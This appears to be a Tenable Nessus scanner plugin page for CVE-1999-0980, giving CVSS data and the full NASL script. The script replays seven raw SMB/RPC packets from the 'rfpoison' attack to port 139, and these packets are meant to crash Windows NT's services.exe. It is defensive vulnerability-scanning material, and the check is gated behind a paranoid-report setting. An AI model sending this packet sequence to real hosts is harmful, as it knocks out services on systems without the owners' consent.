
Microsoft Windows NT SCM Malformed Resource Enumeration Request DoS

1999-11-0100:00:00
This script is Copyright (C) 1999-2022 Tenable Network Security, Inc.
www.tenable.com

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

0.084 Low

EPSS

Percentile

94.4%

An ‘rfpoison’ packet has been sent to the remote host. This packet is supposed to crash the ‘services.exe’ process, making the system unstable.

#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  # --- identity and revision ---------------------------------------------
  script_id(10204);
  script_version("1.31");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/12/07");

  # --- what the check reports -------------------------------------------
  script_name(english:"Microsoft Windows NT SCM Malformed Resource Enumeration Request DoS");
  script_summary(english:"Crashes the remote host using the 'rfpoison' attack");

  # --- external references ----------------------------------------------
  script_cve_id("CVE-1999-0980");
  script_bugtraq_id(754);
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-1999-0980");

  # --- report text --------------------------------------------------------
  script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to a denial of service.");
  script_set_attribute(attribute:"description", value:
"An 'rfpoison' packet has been sent to the remote host. This packet is
supposed to crash the 'services.exe' process, making the system
unstable.");
  # The see_also link redirects to the vendor bulletin:
  # https://docs.microsoft.com/en-us/security-updates/securitybulletins/1999/ms99-055
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?b921cc98");
  script_set_attribute(attribute:"solution", value:
"Apply NT4 last service pack, or better, upgrade to Windows last
version.");

  # --- scoring ------------------------------------------------------------
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  # --- dates --------------------------------------------------------------
  script_set_attribute(attribute:"vuln_publication_date", value:"1999/10/31");
  script_set_attribute(attribute:"plugin_publication_date", value:"1999/11/01");

  # --- classification -----------------------------------------------------
  # potential_vulnerability: the check reports on sending the packets,
  # it does not confirm the outcome on the target.
  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  # ACT_DENIAL: this check may disrupt the target and is gated by the
  # ParanoidReport setting required below.
  script_category(ACT_DENIAL);
  script_copyright(english:"This script is Copyright (C) 1999-2022 Tenable Network Security, Inc.");
  script_family(english:"Windows");

  script_require_keys("Settings/ParanoidReport");
  script_require_ports(139);

  exit(0);
}

# Disruptive check: only proceed when the scan policy enables paranoid reporting.
if (report_paranoia < 2) audit(AUDIT_PARANOID);

# Skip hosts whose reported Windows version has a 5.x-or-later major number;
# the solution text targets NT4, so anything newer is out of scope.
# An unknown version falls through and the check is still attempted.
version = get_kb_item("SMB/WindowsVersion");
if (version && preg(pattern:"[5-9]\.", string:version)) exit(0);


# Replays the stored packet sequence against port 139 and reports on it.
# If port 139 is closed or the socket cannot be opened, nothing is
# reported and the script simply ends.
if(get_port_state(139))
{
 soc = open_sock_tcp(139);
 if(soc)
 {

#
# This is the result of rfp's secret program. I don't pretend
# I understand it, but it works.
#
# Review notes:
#  - The seven raw_string() packets below are replayed verbatim and in a
#    fixed order.  After each send, up to 1024 bytes of reply are read and
#    discarded, so nothing here checks that a packet was accepted or that
#    the target was affected.
#  - security_warning() is raised on port 139 as soon as the last packet
#    has been sent; the result is unverified, which is why the description
#    block marks the plugin potential_vulnerability:true.
#  - The packet bytes are opaque here; no claim is made about their
#    structure beyond what the surrounding calls show.
#

# Exchange 1: reply read and ignored.
data = raw_string(0x81,0x0,0x0,0x48,0x20,0x43,0x4b,0x46,0x44,0x45,0x4e,0x45,0x43,0x46,0x44,0x45,0x46,0x46,0x43,0x46,0x47,0x45,0x46,0x46,0x43,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x0,0x20,0x45,0x48,0x45,0x42,0x46,0x45,0x45,0x46,0x45,0x4c,0x45,0x46,0x45,0x46,0x46,0x41,0x45,0x46,0x46,0x43,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x0,0x0,0x0,0x0,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

# Exchange 2: reply read and ignored.
data = raw_string(0x0,0x0,0x0,0xa4,0xff,0x53,0x4d,0x42,0x72,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x0,0x1,0x0,0x0,0x81,0x0,0x2,0x50,0x43,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x20,0x50,0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x0,0x2,0x4d,0x49,0x43,0x52,0x4f,0x53,0x4f,0x46,0x54,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x53,0x20,0x31,0x2e,0x30,0x33,0x0,0x2,0x4d,0x49,0x43,0x52,0x4f,0x53,0x4f,0x46,0x54,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x53,0x20,0x33,0x2e,0x30,0x0,0x2,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x0,0x2,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,0x32,0x0,0x2,0x53,0x61,0x6d,0x62,0x61,0x0,0x2,0x4e,0x54,0x20,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x20,0x31,0x2e,0x30,0x0,0x2,0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

# Exchange 3: reply read and ignored.
data = raw_string(0x0,0x0,0x0,0x54,0xff,0x53,0x4d,0x42,0x73,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x0,0x1,0x0,0xd,0xff,0x0,0x0,0x0,0xff,0xff,0x2,0x0,0xf4,0x1,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x17,0x0,0x0,0x0,0x57,0x4f,0x52,0x4b,0x47,0x52,0x4f,0x55,0x50,0x0,0x55,0x6e,0x69,0x78,0x0,0x53,0x61,0x6d,0x62,0x61,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

# Exchange 4: reply read and ignored.
data = raw_string(0x0,0x0,0x0,0x42,0xff,0x53,0x4d,0x42,0x75,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x8,0x1,0x0,0x4,0xff,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x17,0x0,0x0,0x5c,0x5c,0x2a,0x53,0x4d,0x42,0x53,0x45,0x52,0x56,0x45,0x52,0x5c,0x49,0x50,0x43,0x24,0x0,0x49,0x50,0x43,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

# Exchange 5: reply read and ignored.
data = raw_string(0x0,0x0,0x0,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x18,0xff,0x0,0x0,0x0,0x0,0x7,0x0,0x6,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x9f,0x1,0x2,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x3,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x0,0x8,0x0,0x5c,0x73,0x72,0x76,0x73,0x76,0x63,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

# Exchange 6: reply read and ignored.
data = raw_string(0x0,0x0,0x0,0x94,0xff,0x53,0x4d,0x42,0x25,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x10,0x0,0x0,0x48,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x4c,0x0,0x48,0x0,0x4c,0x0,0x2,0x0,0x26,0x0,0x0,0x8,0x51,0x0,0x5c,0x50,0x49,0x50,0x45,0x5c,0x0,0x0,0x0,0x5,0x0,0xb,0x0,0x10,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x30,0x16,0x30,0x16,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0xc8,0x4f,0x32,0x4b,0x70,0x16,0xd3,0x1,0x12,0x78,0x5a,0x47,0xbf,0x6e,0xe1,0x88,0x3,0x0,0x0,0x0,0x4,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x8,0x0,0x2b,0x10,0x48,0x60,0x2,0x0,0x0,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

# Exchange 7 (last packet): reply read and ignored.
data = raw_string(0x0,0x0,0x0,0xa4,0xff,0x53,0x4d,0x42,0x25,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x10,0x0,0x0,0x58,0x0,0x0,0x0,0x58,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x4c,0x0,0x58,0x0,0x4c,0x0,0x2,0x0,0x26,0x0,0x0,0x8,0x61,0x0,0x5c,0x50,0x49,0x50,0x45,0x5c,0x0,0x0,0x0,0x5,0x0,0x0,0x3,0x10,0x0,0x0,0x0,0x58,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x0,0x0,0xf,0x0,0x1,0x0,0x0,0x0,0xd,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xd,0x0,0x0,0x0,0x5c,0x0,0x5c,0x0,0x2a,0x0,0x53,0x0,0x4d,0x0,0x42,0x0,0x53,0x0,0x45,0x0,0x52,0x0,0x56,0x0,0x45,0x0,0x52,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0);

send(socket:soc, data:data);
recv(socket:soc, length:1024);

# Reported unconditionally once the sequence has been sent -- no probe
# of the target's state follows.  The socket is closed afterwards; this
# is the only path on which it is opened, so no leak on other paths.
security_warning(port:139);
close(soc);
 }
}
